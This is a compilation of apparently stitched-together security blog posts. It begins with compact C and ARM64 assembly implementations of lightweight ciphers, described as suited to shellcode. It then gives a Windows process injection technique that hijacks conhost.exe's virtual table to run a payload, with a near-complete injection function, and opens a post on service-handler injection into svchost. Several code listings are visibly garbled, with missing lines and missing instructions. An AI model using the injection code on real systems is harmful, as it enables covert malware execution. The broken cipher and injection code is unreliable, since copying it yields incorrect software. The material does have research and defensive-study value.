```#define R(v,n)(((v)<<(n))|((v)>>(32-(n))))
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)

void simeck(void*mk,void*p){
unsigned int t,k0,k1,k2,k3,l,r,*k=mk,*x=p;
unsigned long long s=0x938BCA3083F;

k0=*k;k1=k[1];k2=k[2];k3=k[3];
r=*x;l=x[1];

do{
r^=R(l,1)^(R(l,5)&l)^k0;
X(l,r);
t=(s&1)-4;
k0^=R(k1,1)^(R(k1,5)&k1)^t;
X(k0,k1);X(k1,k2);X(k2,k3);
} while(s>>=1);
*x=r; x[1]=l;
}
```

I cannot say if SIMECK is more compact than SIMON in hardware. However, SPECK is clearly more compact in software.

```
// SIMECK in ARM64 assembly
// 100 bytes

.arch armv8-a
.text
.global simeck

simeck:
// unsigned long long s = 0x938BCA3083F;
movz    x2, 0x083F
movk    x2, 0xBCA3, lsl 16
movk    x2, 0x0938, lsl 32

ldp     w3, w4, [x0]
ldp     w5, w6, [x0, 8]

ldp     w8, w7, [x1]
L0:
// r ^= R(l,1) ^ (R(l,5) & l) ^ k0;
eor     w9, w3, w7, ror 31
and     w10, w7, w7, ror 27
eor     w9, w9, w10
mov     w10, w7
eor     w7, w8, w9
mov     w8, w10

// t1 = (s & 1) - 4;
// k0 ^= R(k1,1) ^ (R(k1,5) & k1) ^ t1;
// X(k0,k1); X(k1,k2); X(k2,k3);
eor     w3, w3, w4, ror 31
and     w9, w4, w4, ror 27
eor     w9, w9, w3
mov     w3, w4
mov     w4, w5
mov     w5, w6
and     x10, x2, 1
sub     x10, x10, 4
eor     w6, w9, w10

// s >>= 1
lsr     x2, x2, 1
cbnz    x2, L0

// save 64-bit ciphertext
stp     w8, w7, [x1]
ret
```

A block cipher designed by Nicky Mouha, Bart Mennink, Anthony Van Herrewege, Dai Watanabe, Bart Preneel and Ingrid Verbauwhede. Although Chaskey is specifically a MAC function, the underlying primitive is a block cipher. What you see below is only encryption, however, it is possible to implement an inverse function for decryption by reversing the function using rol and sub in place of ror and add.

Chaskey: An Efficient MAC Algorithm for 32-bit Microcontrollers

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)

unsigned int i,*x=p,*k=mk;

F(4)x[i]^=k[i];
F(16)
*x+=x[1],
x[1]=R(x[1],27)^*x,
x[2]+=x[3],
x[3]=R(x[3],24)^x[2],
x[2]+=x[1],
*x=R(*x,16)+x[3],
x[3]=R(x[3],19)^*x,
x[1]=R(x[1],25)^x[2],
x[2]=R(x[2],16);
F(4)x[i]^=k[i];
}
```
```
// 112 bytes

.arch armv8-a
.text

ldp    w2, w3, [x0]
ldp    w4, w5, [x0, 8]

ldp    w6, w7, [x1]
ldp    w8, w9, [x1, 8]

// xor plaintext with key
eor    w6, w6, w2          // x[0] ^= k[0];
eor    w7, w7, w3          // x[1] ^= k[1];
eor    w8, w8, w4          // x[2] ^= k[2];
eor    w9, w9, w5          // x[3] ^= k[3];
mov    w10, 16             // i = 16
L0:
add    w6, w6, w7          // x[0] += x[1];
eor    w7, w6, w7, ror 27  // x[1]=R(x[1],27) ^ x[0];
add    w8, w8, w9          // x[2] += x[3];
eor    w9, w8, w9, ror 24  // x[3]=R(x[3],24) ^ x[2];
add    w8, w8, w7          // x[2] += x[1];
ror    w6, w6, 16
add    w6, w9, w6          // x[0]=R(x[0],16) + x[3];
eor    w9, w6, w9, ror 19  // x[3]=R(x[3],19) ^ x[0];
eor    w7, w8, w7, ror 25  // x[1]=R(x[1],25) ^ x[2];
ror    w8, w8, 16          // x[2]=R(x[2],16);
subs   w10, w10, 1         // i--
bne    L0                  // i > 0

// xor cipher text with key
eor    w6, w6, w2          // x[0] ^= k[0];
eor    w7, w7, w3          // x[1] ^= k[1];
eor    w8, w8, w4          // x[2] ^= k[2];
eor    w9, w9, w5          // x[3] ^= k[3];

// save 128-bit cipher text
stp    w6, w7, [x1]
stp    w8, w9, [x1, 8]
ret
```

### 7.9 XTEA

A block cipher designed by Roger Needham and David Wheeler. It was published in 1998 as a response to weaknesses found in the Tiny Encryption Algorithm (TEA). XTEA compared to its predecessor TEA contains a more complex key-schedule and rearrangement of shifts, XORs, and additions. The implementation here uses 32 rounds.

Tea Extensions

```void xtea(void*mk,void*p){
unsigned int t,r=65,s=0,*k=mk,*x=p;

while(--r)
t=x[1],
x[1]=*x+=((((t<<4)^(t>>5))+t)^
(s+k[((r&1)?s+=0x9E3779B9,
s>>11:s)&3])),*x=t;
}
```

Although the round counter r is initialized to 65, it is only performing 32 rounds of encryption. If 64 rounds were required, then r should be initialized to 129 (64*2+1). Perhaps it would make more sense to allow a number of rounds as a parameter, but this is simply for illustration.

```
// XTEA in ARM64 assembly
// 92 bytes

.arch armv8-a
.text

.equ ROUNDS, 32

.global xtea

// xtea(void*mk, void*data);
xtea:
mov    w7, ROUNDS * 2

ldp    w2, w4, [x1]         // x0  = x[0], x1 = x[1];
mov    w3, wzr              // sum = 0;
ldr    w5, =0x9E3779B9      // c   = 0x9E3779B9;
L0:
mov    w6, w3               // t0 = sum;
tbz    w7, 0, L1            // if ((i & 1)==0) goto L1;

// the next 2 only execute if (i % 2) is not zero
add    w3, w3, w5           // sum += 0x9E3779B9;
lsr    w6, w3, 11           // t0 = sum >> 11
L1:
and    w6, w6, 3            // t0 %= 4
ldr    w6, [x0, x6, lsl 2]  // t0 = k[t0];
add    w8, w3, w6           // t1 = sum + t0
mov    w6, w4, lsl 4        // t0 = (x1 << 4)
eor    w6, w6, w4, lsr 5    // t0^= (x1 >> 5)
add    w6, w6, w4           // t0+= x1
eor    w6, w6, w8           // t0^= t1
mov    w8, w4               // backup x1
add    w4, w6, w2           // x1 = t0 + x0

// XCHG(x0, x1)
mov    w2, w8               // x0 = x1
subs   w7, w7, 1
bne    L0                   // i > 0
stp    w2, w4, [x1]
ret
```

### 7.10 NOEKEON

A block cipher designed by Joan Daemen, Michaël Peeters, Gilles Van Assche and Vincent Rijmen.

Noekeon website

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))

void noekeon(void*mk,void*p){
unsigned int a,b,c,d,t,*k=mk,*x=p;
unsigned char rc=128;

a=*x;b=x[1];c=x[2];d=x[3];

for(;;) {
a^=rc;t=a^c;t^=R(t,8)^R(t,24);
b^=t;d^=t;a^=k[0];b^=k[1];
c^=k[2];d^=k[3];t=b^d;
t^=R(t,8)^R(t,24);a^=t;c^=t;
if(rc==212)break;
rc=((rc<<1)^((rc>>7)*27));
b=R(b,31);c=R(c,27);d=R(d,30);
b^=~((d)|(c));t=d;d=a^c&b;a=t;
c^=a^b^d;b^=~((d)|(c));a^=c&b;
b=R(b,1);c=R(c,5);d=R(d,2);
}
*x=a;x[1]=b;x[2]=c;x[3]=d;
}
```

NOEKEON can be implemented quite well for both INTEL and ARM architectures.

```
// NOEKEON in ARM64 assembly
// 212 bytes

.arch armv8-a
.text

.global noekeon

noekeon:
mov    x12, x1

ldp    w4, w5, [x0]
ldp    w6, w7, [x0, 8]

ldp    w2, w3, [x1, 8]
ldp    w0, w1, [x1]

// c = 128
mov    w8, 128
mov    w9, 27
L0:
// a^=rc;t=a^c;t^=R(t,8)^R(t,24);
eor    w0, w0, w8
eor    w10, w0, w2
eor    w11, w10, w10, ror 8
eor    w10, w11, w10, ror 24

// b^=t;d^=t;a^=k[0];b^=k[1];
eor    w1, w1, w10
eor    w3, w3, w10
eor    w0, w0, w4
eor    w1, w1, w5

// c^=k[2];d^=k[3];t=b^d;
eor    w2, w2, w6
eor    w3, w3, w7
eor    w10, w1, w3

// t^=R(t,8)^R(t,24);a^=t;c^=t;
eor    w11, w10, w10, ror 8
eor    w10, w11, w10, ror 24
eor    w0, w0, w10
eor    w2, w2, w10

// if(rc==212)break;
cmp    w8, 212
beq    L1

// rc=((rc<<1)^((rc>>7)*27));
lsr    w10, w8, 7
mul    w10, w10, w9
eor    w8, w10, w8, lsl 1
uxtb   w8, w8

// b=R(b,31);c=R(c,27);d=R(d,30);
ror    w1, w1, 31
ror    w2, w2, 27
ror    w3, w3, 30

// b^=~(d|c);t=d;d=a^(c&b);a=t;
orr    w10, w3, w2
eon    w1, w1, w10
mov    w10, w3
and    w3, w2, w1
eor    w3, w3, w0
mov    w0, w10

// c^=a^b^d;b^=~(d|c);a^=c&b;
eor    w2, w2, w0
eor    w2, w2, w1
eor    w2, w2, w3
orr    w10, w3, w2
eon    w1, w1, w10
and    w10, w2, w1
eor    w0, w0, w10

// b=R(b,1);c=R(c,5);d=R(d,2);
ror    w1, w1, 1
ror    w2, w2, 5
ror    w3, w3, 2
b      L0
L1:
// *x=a;x[1]=b;x[2]=c;x[3]=d;
stp    w0, w1, [x12]
stp    w2, w3, [x12, 8]
ret
```

### 7.11 CHAM

A block cipher designed by Bonwook Koo, Dongyoung Roh, Hyeonjin Kim, Younghoon Jung, Dong-Geon Lee, and Daesung Kwon.

CHAM: A Family of Lightweight Block Ciphers for Resource-Constrained Devices.

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned int W;

void cham(void*mk,void*p){
W rk[8],*w=p,*k=mk,i,t;

F(4)
t=k[i]^R(k[i],31),
rk[i]=t^R(k[i],24),
rk[(i+4)^1]=t^R(k[i],21);
F(80)
t=w[3],w[0]^=i,w[3]=rk[i&7],
w[3]^=R(w[1],(i&1)?24:31),
w[3]+=w[0],
w[3]=R(w[3],(i&1)?31:24),
w[0]=w[1],w[1]=w[2],w[2]=t;
}
```

This algorithm works better for 32-bit ARM where conditional execution of all instructions is supported.

```
// CHAM 128/128 in ARM64 assembly
// 160 bytes

.arch armv8-a
.text
.global cham

// cham(void*mk,void*p);
cham:
sub    sp, sp, 32
mov    w2, wzr
mov    x8, x1
L0:
// t=k[i]^R(k[i],31),
ldr    w5, [x0, x2, lsl 2]
eor    w6, w5, w5, ror 31

// rk[i]=t^R(k[i],24),
eor    w7, w6, w5, ror 24
str    w7, [sp, x2, lsl 2]

// rk[(i+4)^1]=t^R(k[i],21);
eor    w7, w6, w5, ror 21
eor    w5, w5, 1
str    w7, [sp, x5, lsl 2]

// i++
// i < 4
cmp    w2, 4
bne    L0

ldp    w0, w1, [x8]
ldp    w2, w3, [x8, 8]

// i = 0
mov    w4, wzr
L1:
tst    w4, 1

// t=w[3],w[0]^=i,w[3]=rk[i%8],
mov    w5, w3
eor    w0, w0, w4
and    w6, w4, 7
ldr    w3, [sp, x6, lsl 2]

// w[3]^=R(w[1],(i & 1) ? 24 : 31),
mov    w6, w1, ror 24
mov    w7, w1, ror 31
csel   w6, w6, w7, ne
eor    w3, w3, w6

// w[3]+=w[0],

// w[3]=R(w[3],(i & 1) ? 31 : 24),
mov    w6, w3, ror 31
mov    w7, w3, ror 24
csel   w3, w6, w7, ne

// w[0]=w[1],w[1]=w[2],w[2]=t;
mov    w0, w1
mov    w1, w2
mov    w2, w5

// i++
// i < 80
cmp    w4, 80
bne    L1

stp    w0, w1, [x8]
stp    w2, w3, [x8, 8]
ret
```

### 7.12 LEA-128

A block cipher designed by Deukjo Hong, Jung-Keun Lee, Dong-Chan Kim, Daesung Kwon, Kwon Ho Ryu, and Dong-Geon Lee.

LEA: A 128-Bit Block Cipher for Fast Encryption on Common Processors

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
typedef unsigned int W;

void lea128(void*mk,void*p){
W r,t,*w=p,*k=mk;
W c[4]=
{0xc3efe9db,0x88c4d604,
0xe789f229,0xc6f98763};

for(r=0;r<24;r++){
t=c[r%4];
c[r%4]=R(t,28);
k[0]=R(k[0]+t,31);
k[1]=R(k[1]+R(t,31),29);
k[2]=R(k[2]+R(t,30),26);
k[3]=R(k[3]+R(t,29),21);
t=x[0];
w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
w[3]=t;
}
}
```

Everything here is very straight forward. All Add, Rotate, Xor operations.

```// LEA-128/128 in ARM64 assembly
// 224 bytes

.arch armv8-a

// include the MOVL macro
.include "../../include.inc"

.text
.global lea128

lea128:
mov    x11, x0
mov    x12, x1

// allocate 16 bytes
sub    sp, sp, 4*4

movl   w0, 0xc3efe9db
movl   w1, 0x88c4d604
movl   w2, 0xe789f229
movl   w3, 0xc6f98763

// store on stack
str    w0, [sp    ]
str    w1, [sp,  4]
str    w2, [sp,  8]
str    w3, [sp, 12]

// for(r=0;r<24;r++) {
mov    w8, wzr

ldp    w4, w5, [x11]
ldp    w6, w7, [x11, 8]

ldp    w0, w1, [x12]
ldp    w2, w3, [x12, 8]
L0:
// t=c[r%4];
and    w9, w8, 3
ldr    w10, [sp, x9, lsl 2]

// c[r%4]=R(t,28);
mov    w11, w10, ror 28
str    w11, [sp, x9, lsl 2]

// k[0]=R(k[0]+t,31);
ror    w4, w4, 31

// k[1]=R(k[1]+R(t,31),29);
ror    w11, w10, 31
ror    w5, w5, 29

// k[2]=R(k[2]+R(t,30),26);
ror    w11, w10, 30
ror    w6, w6, 26

// k[3]=R(k[3]+R(t,29),21);
ror    w11, w10, 29
ror    w7, w7, 21

// t=x[0];
mov    w10, w0

// w[0]=R((w[0]^k[0])+(w[1]^k[1]),23);
eor    w0, w0, w4
eor    w9, w1, w5
ror    w0, w0, 23

// w[1]=R((w[1]^k[2])+(w[2]^k[1]),5);
eor    w1, w1, w6
eor    w9, w2, w5
ror    w1, w1, 5

// w[2]=R((w[2]^k[3])+(w[3]^k[1]),3);
eor    w2, w2, w7
eor    w3, w3, w5
ror    w2, w2, 3

// w[3]=t;
mov    w3, w10

// r++
// r < 24
cmp    w8, 24
bne    L0

// save 128-bit ciphertext
stp    w0, w1, [x12]
stp    w2, w3, [x12, 8]

ret

```

### 7.13 CHACHA

A stream cipher designed by Daniel Bernstein and published in 2008. This along with Poly1305 for authentication has become a drop in replacement on handheld devices for AES-128-GCM where AES native instructions are unavailable. The version implemented here is based on a description provided in RFC8439 that uses a 256-bit key, a 32-bit counter and 96-bit nonce.

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
#define X(a,b)(t)=(a),(a)=(b),(b)=(t)
typedef unsigned int W;

void P(W*s,W*x){
W a,b,c,d,i,t,r;
W v[8]={0xC840,0xD951,0xEA62,0xFB73,
0xFA50,0xCB61,0xD872,0xE943};

F(16)x[i]=s[i];

F(80) {
d=v[i%8];
a=(d&15);b=(d>>4&15);
c=(d>>8&15);d>>=12;

for(r=0x19181410;r;r>>=8)
x[a]+=x[b],
x[d]=R(x[d]^x[a],(r&255)),
X(a,c),X(b,d);
}
F(16)x[i]+=s[i];
s[12]++;
}
void chacha(W l,void*in,void*state){
unsigned char c[64],*p=in;
W i,r,*s=state,*k=in;

if(l) {
while(l) {
P(s,(W*)c);
r=(l>64)?64:l;
F(r)*p++^=c[i];
l-=r;
}
} else {
s[0]=0x61707865;s[1]=0x3320646E;
s[2]=0x79622D32;s[3]=0x6B206574;
F(12)s[i+4]=k[i];
}
}
```

The permutation function makes use of the UBFX instruction.

```// ChaCha in ARM64 assembly
// 348 bytes

.arch armv8-a
.text
.global chacha

.include "../../include.inc"

P:

// F(16)x[i]=s[i];
mov     x8, 0
P0:
ldr     w14, [x2, x8, lsl 2]
str     w14, [x3, x8, lsl 2]

cmp     x8, 16
bne     P0

mov     x8, 0
P1:
// d=v[i%8];
and     w12, w8, 7
ldrh    w12, [x13, x12, lsl 1]

// a=(d&15);b=(d>>4&15);
// c=(d>>8&15);d>>=12;
ubfx    w4, w12, 0, 4
ubfx    w5, w12, 4, 4
ubfx    w6, w12, 8, 4
ubfx    w7, w12, 12, 4

movl    w10, 0x19181410
P2:
// x[a]+=x[b],
ldr     w11, [x3, x4, lsl 2]
ldr     w12, [x3, x5, lsl 2]
str     w11, [x3, x4, lsl 2]

// x[d]=R(x[d]^x[a],(r&255)),
ldr     w12, [x3, x7, lsl 2]
eor     w12, w12, w11
and     w14, w10, 255
ror     w12, w12, w14
str     w12, [x3, x7, lsl 2]

// X(a,c),X(b,d);
stp     w4, w6, [sp, -16]!
ldp     w6, w4, [sp], 16
stp     w5, w7, [sp, -16]!
ldp     w7, w5, [sp], 16

// r >>= 8
lsr    w10, w10, 8
cbnz   w10, P2

// i++
// i < 80
cmp    x8, 80
bne    P1

// F(16)x[i]+=s[i];
mov    x8, 0
P3:
ldr    w11, [x2, x8, lsl 2]
ldr    w12, [x3, x8, lsl 2]
str    w11, [x3, x8, lsl 2]

cmp    x8, 16
bne    P3

// s[12]++;
ldr    w11, [x2, 12*4]
str    w11, [x2, 12*4]
ret
cc_v:
.2byte 0xC840, 0xD951, 0xEA62, 0xFB73
.2byte 0xFA50, 0xCB61, 0xD872, 0xE943

// void chacha(int l, void *in, void *state);
chacha:
str    x30, [sp, -96]!
cbz    x0, L2

mov    x9, 64
L0:
// P(s,(W*)c);
bl     P

// r=(l > 64) ? 64 : l;
cmp    x0, 64
csel   x10, x0, x9, ls

// F(r)*p++^=c[i];
mov    x8, 0
L1:
ldrb   w11, [x3, x8]
ldrb   w12, [x1]
eor    w11, w11, w12
strb   w11, [x1], 1

cmp    x8, x10
bne    L1

// l-=r;
subs   x0, x0, x10
bne    L0
beq    L4
L2:
// s[0]=0x61707865;s[1]=0x3320646E;
movl   w11, 0x61707865
movl   w12, 0x3320646E
stp    w11, w12, [x2]

// s[2]=0x79622D32;s[3]=0x6B206574;
movl   w11, 0x79622D32
movl   w12, 0x6B206574
stp    w11, w12, [x2, 8]

// F(12)s[i+4]=k[i];
mov    x8, 16
sub    x1, x1, 16
L3:
ldr    w11, [x1, x8]
str    w11, [x2, x8]
cmp    x8, 64
bne    L3
L4:
ldr    x30, [sp], 96
ret
```

### 7.14 PRESENT

A block cipher specifically designed for hardware and published in 2007. Why implement a hardware cipher? PRESENT is a 64-bit block cipher that can be implemented reasonably well on any 64-bit architecture. Although the data and key are byte swapped before being processed using the REV instruction, stripping this should not affect security of the cipher.

PRESENT: An Ultra-Lightweight Block Cipher

```#define R(v,n)(((v)>>(n))|((v)<<(64-(n))))
#define F(a,b)for(a=0;a<b;a++)

typedef unsigned long long W;
typedef unsigned char B;

B sbox[16] =
{0xc,0x5,0x6,0xb,0x9,0x0,0xa,0xd,
0x3,0xe,0xf,0x8,0x4,0x7,0x1,0x2 };

B S(B x) {
return (sbox[(x&0xF0)>>4]<<4)|sbox[(x&0x0F)];
}

#define rev __builtin_bswap64

void present(void*mk,void*data) {
W i,j,r,p,t,t2,k0,k1,*k=(W*)mk,*x=(W*)data;

k0=rev(k[0]); k1=rev(k[1]);t=rev(x[0]);

F(i,32-1) {
p=t^k0;
F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
t=0;r=0x0030002000100000;
F(j,64)
t|=((p>>j)&1)<<(r&255),
r=R(r+1,16);
p =(k0<<61)|(k1>>3);
k1=(k1<<61)|(k0>>3);
p=R(p,56);
((B*)&p)[0]=S(((B*)&p)[0]);
k0=R(p,8)^((i+1)>>2);
k1^=(((i+1)& 3)<<62);
}
x[0] = rev(t^k0);
}
```

The sbox lookup routine (S) uses UBFX and BFI/BFXIL in place of LSR,LSL,AND and ORR. The source requires preprocessing with `cpp -E` before assembly.

```// PRESENT in ARM64 assembly
// 224 bytes

.arch armv8-a
.text
.global present

#define k  x0
#define x  x1
#define r  w2
#define p  x3
#define t  x4
#define k0 x5
#define k1 x6
#define i  x7
#define j  x8
#define s  x9

present:
str     lr, [sp, -16]!

// k0=k[0];k1=k[1];t=x[0];
ldp     k0, k1, [k]
ldr     t, [x]

// only dinosaurs use big endian convention
rev     k0, k0
rev     k1, k1
rev     t, t

mov     i, 0
L0:
// p=t^k0;
eor     p, t, k0

// F(j,8)((B*)&p)[j]=S(((B*)&p)[j]);
mov     j, 8
L1:
bl      S
ror     p, p, 8
subs    j, j, 1
bne     L1

// t=0;r=0x0030002000100000;
mov     t, 0
ldr     r, =0x30201000
// F(j,64)
mov     j, 0
L2:
// t|=((p>>j)&1)<<(r&255),
lsr     x10, p, j         // x10 = (p >> j) & 1
and     x10, x10, 1       //
lsl     x10, x10, x2      // x10 << r
orr     t, t, x10         // t |= x10

// r=R(r+1,16);
add     r, r, 1           // r = R(r+1, 8)
ror     r, r, 8

add     j, j, 1           // j++
cmp     j, 64             // j < 64
bne     L2

// p =(k0<<61)|(k1>>3);
lsr     p, k1, 3
orr     p, p, k0, lsl 61

// k1=(k1<<61)|(k0>>3);
lsr     k0, k0, 3
orr     k1, k0, k1, lsl 61

// p=R(p,56);
ror     p, p, 56
bl      S

// i++

// k0=R(p,8)^((i+1)>>2);
lsr     x10, i, 2
eor     k0, x10, p, ror 8

// k1^= (((i+1)&3)<<62);
and     x10, i, 3
eor     k1, k1, x10, lsl 62

// i < 31
cmp     i, 31
bne     L0

// x[0] = t ^= k0
eor     p, t, k0
rev     p, p
str     p, [x]

ldr     lr, [sp], 16
ret

S:
ubfx    x10, p, 0, 4              // x10 = (p & 0x0F)
ubfx    x11, p, 4, 4              // x11 = (p & 0xF0) >> 4

ldrb    w10, [s, w10, uxtw 0]     // w10 = s[w10]
ldrb    w11, [s, w11, uxtw 0]     // w11 = s[w11]

bfi     p, x10, 0, 4              // p[0] = ((x11 << 4) | x10)
bfi     p, x11, 4, 4

ret
sbox:
.byte 0xc, 0x5, 0x6, 0xb, 0x9, 0x0, 0xa, 0xd
.byte 0x3, 0xe, 0xf, 0x8, 0x4, 0x7, 0x1, 0x2

```

### 7.15 LIGHTMAC

A Message Authentication Code using block ciphers. Designed by Atul Luykx, Bart Preneel, Elmar Tischhauser, and Kan Yasuda. The version shown here only supports ciphers with a 64-bit block size and 128-bit key. E is defined as a block cipher. For this code, one could use XTEA, SPECK-64/128 or PRESENT. If BLK_LEN and TAG_LEN are changed to 16, it will support 128-bit ciphers like AES-128, CHASKEY, CHAM-128/128, SPECK-128/256, LEA-128, NOEKEON. Based on the parameters used here, the largest message length can be 1,792 bytes. For a shellcode trasmitting small packets, this should be sufficient.

A MAC Mode for Lightweight Block Ciphers

To improve upon the parameters used for 64-bit block ciphers, read the following paper.

Blockcipher-based MACs: Beyond the Birthday Bound without Message Length

```#define CTR_LEN     1 // 8-bits
#define BLK_LEN     8 // 64-bits
#define TAG_LEN     8 // 64-bits
#define BC_KEY_LEN 16 // 128-bits

#define M_LEN         BLK_LEN-CTR_LEN

void present(void*mk,void*data);
#define E present

#define F(a,b)for(a=0;a<b;a++)
typedef unsigned int W;
typedef unsigned char B;

// max message for current parameters is 1792 bytes
void lm(B*b,W l,B*k,B*t) {
int i,j,s;
B   m[BLK_LEN];

// initialize tag T
F(i,TAG_LEN)t[i]=0;

for(s=1,j=0; l>=M_LEN; s++,l-=M_LEN) {
m[0] = s;
F(j,M_LEN)
m[CTR_LEN+j]=*b++;
// encrypt M with K1
E(k,m);
// update T
F(i,TAG_LEN)t[i]^=m[i];
}
// copy remainder of input
F(i,l)m[i]=b[i];
m[i]=0x80;
// update T
F(i,l+1)t[i]^=m[i];
// encrypt T with K2
k+=BC_KEY_LEN;
E(k,t);
}
```

No assembly for this right now, but feel free to have a go!

## 8. Summary

ARM expects their “Deimos” design scheduled for 2019 and “Hercules” for 2020 to outperform any laptop class CPU from Intel. The ARM64 instruction set is almost perfect. The only minor thing that annoys me is how the x30 register (Link Register) must be saved across calls to subroutines. There’s also no rotate left or modulus instructions that would be useful.

All code shown here can be found in this github repo.

## Windows Process Injection: ConsoleWindowClass

### Introduction

Every window object has support for User Data that can be set via the SetWindowLongPtr API and GWLP_USERDATA parameter. The User Data of a window is simply a small amount of memory that is normally used for storing a pointer to a class object. In the case of the Console Window Host (conhost) process, it stores the address of a data structure. Contained within the structure is information about the window’s current position on the desktop, its dimensions, an object handle, and of course a class object with methods to control the behaviour of the console window.

The user data in conhost.exe is stored on the heap with writeable permissions. This makes it possible to use for process injection and is very similar to the Extra Bytes method I discussed before.

### ConsoleWindowClass

In figure 1, we see the properties of a window object used by a console application. Note how the Window Proc field is empty. The User Data field points to a virtual address, but it does not reside within the console application itself. Rather, the user data structure is in the conhost.exe process spawned by the system when the console application started.

Figure 1 : Virtual address of data structure.

Figure 2 shows the class information of the window and highlighted is the address of a callback procedure responsible for processing window messages.

Figure 2 : Window Procedure to process messages from the operating system.

### Debugging conhost.exe

Figure 3 shows a debugger attached to the console host and a dump of the user data value 0x000001CB3836F580. The first 64-bit value points to a virtual table of methods (array of functions).

Figure 3 : User data address.

Figure 4 shows the list of methods stored in the virtual table.

Figure 4 : Virtual table functions.

Before overwriting anything, we need to determine how to trigger execution of these methods from an external application. Setting a “break on access” (ba) for the virtual table, and sending messages to the window should reveal what’s acceptable. Figure 5 shows a breakpoint triggered after sending the WM_SETFOCUS message.

Figure 5 : Break on access of virtual table

Now that we know how to trigger execution, we just need to hijack a method. In this case, GetWindowHandle is called first when processing the WM_SETFOCUS message. Figure 6 show this method does not require any parameters and simply returns a window handle from the user data.

Figure 6 : GetWindowHandle method

### The virtual table

The following structure defines the virtual table used by conhost to control the behaviour of the console window. There’s no need to define prototypes for each method unless we intended to use something other than GetWindowHandle which doesn’t take any parameters.

```typedef struct _vftable_t {
ULONG_PTR     EnableBothScrollBars;
ULONG_PTR     IsInFullscreen;
ULONG_PTR     SetIsFullscreen;
ULONG_PTR     SetViewportOrigin;
ULONG_PTR     SetWindowHasMoved;
ULONG_PTR     CaptureMouse;
ULONG_PTR     ReleaseMouse;
ULONG_PTR     GetWindowHandle;
ULONG_PTR     SetOwner;
ULONG_PTR     GetCursorPosition;
ULONG_PTR     GetClientRectangle;
ULONG_PTR     MapPoints;
ULONG_PTR     ConvertScreenToClient;
ULONG_PTR     SendNotifyBeep;
ULONG_PTR     PostUpdateTitleWithCopy;
ULONG_PTR     PostUpdateWindowSize;
ULONG_PTR     UpdateWindowSize;
ULONG_PTR     UpdateWindowText;
ULONG_PTR     HorizontalScroll;
ULONG_PTR     VerticalScroll;
ULONG_PTR     SignalUia;
ULONG_PTR     UiaSetTextAreaFocus;
ULONG_PTR     GetWindowRect;
} ConsoleWindow;
```

### User Data Structure

Figure 7 shows the total size of the user data structure is 104 bytes. Since the allocation has PAGE_READWRITE protection by default, one can simply overwrite the pointer to the virtual table with a duplicate that contains the address of a payload.

Figure 7 : Allocation of data structure.

### Full function

This function demonstrates how to replace the virtual table with a duplicate before triggering execution of some code. Tested and working on a 64-bit version of Windows 10.

```VOID conhostInject(LPVOID payload, DWORD payloadSize) {
HWND          hwnd;
LONG_PTR      udptr;
DWORD         pid, ppid;
SIZE_T        wr;
HANDLE        hp;
ConsoleWindow cw;
LPVOID        cs, ds;
ULONG_PTR     vTable;

// 1. Obtain handle and process id for a console window
//   (this assumes one already running)
hwnd = FindWindow(L"ConsoleWindowClass", NULL);

// 2. Obtain the process id for the host process
pid = conhostId(ppid);

// 3. Open the conhost.exe process
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

// 4. Allocate RWX memory and copy the payload there

udptr = GetWindowLongPtr(hwnd, GWLP_USERDATA);
(LPVOID)&vTable, sizeof(ULONG_PTR), &wr);

// 6. Read the current virtual table into local memory
(LPVOID)&cw, sizeof(ConsoleWindow), &wr);

// 7. Allocate RW memory for the new virtual table
ds = VirtualAllocEx(hp, NULL, sizeof(ConsoleWindow),
// 8. update the local copy of virtual table with
cw.GetWindowHandle = (ULONG_PTR)cs;
WriteProcessMemory(hp, ds, &cw, sizeof(ConsoleWindow), &wr);

// 9. Update pointer to virtual table in remote process
WriteProcessMemory(hp, (LPVOID)udptr, &ds,
sizeof(ULONG_PTR), &wr);

// 10. Trigger execution of the payload
SendMessage(hwnd, WM_SETFOCUS, 0, 0);

// 11. Restore pointer to original virtual table
WriteProcessMemory(hp, (LPVOID)udptr, &vTable,
sizeof(ULONG_PTR), &wr);

// 12. Release memory and close handles
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);

CloseHandle(hp);
}
```

### Summary

This is another variation of a “Shatter” attack where window messages and callback functions are misused to execute code without creating a new thread. The approach shown here is limited to console windows or more specifically the “ConsoleWindowClass” object. However, other applications also use GWLP_USERDATA to store a pointer to a class object. A PoC can be found here.

## Windows Process Injection: Service Control Handler

### Introduction

This post will show another way to execute code in a remote process without using conventional API. The standard or conventional way to create new threads in a remote process requires using one of the following APIs.

This method of injection uses the ControlService API, and thus requires a service for it to work. As some of you may recall, I discussed an approach to stopping the Event logger service by executing the Control Handler remotely. Here, I hijack a pointer to the control handler to execute a payload. To the best of my knowledge, this is a new method that hasn’t been described before.

### Demonstration

In figure 1, we can see a list of potential target services shown in process explorer. For this example we’ll use Dhcp hosted by svchost.exe. Any other service should work fine too, but we need to locate the Internal Dispatch Entry (IDE) for the service first and that’s the most difficult part in all this.

Figure 1 : Using the Dhcp service for process injection.

Figure 2 shows the PoC being used to inject a Position Independent Code (PIC) into svchost.exe that will then execute the calculator.

Figure 2 : Injection via Dhcp service.

Figure 3 shows calc.exe running as a child process of the Dhcp host process.

Figure 3 : Calculator running under host process.

### Handler prototype

There are two different prototypes for handlers. The first one simply accepts a control code.

```VOID Handler(DWORD dwControl)
```

The second that is more common for Windows based services would be HandlerEx.

```DWORD HandlerEx(
DWORD dwControl,
DWORD dwEventType,
LPVOID lpEventData,
LPVOID lpContext)
```

In the services I tested, most were using HandlerEx. That said, there might be a way to determine the exact prototype required and avoid crashing the host process if the wrong one is used. Since there are only at most four parameters, it’s possible to escape a crash on 64-bit systems due to the Microsoft fastcall convention that places the first four parameters in registers RCX, RDX, R8 and R9. The same is not true for 32-bit systems that use the stdcall convention and that’s where it really matters.

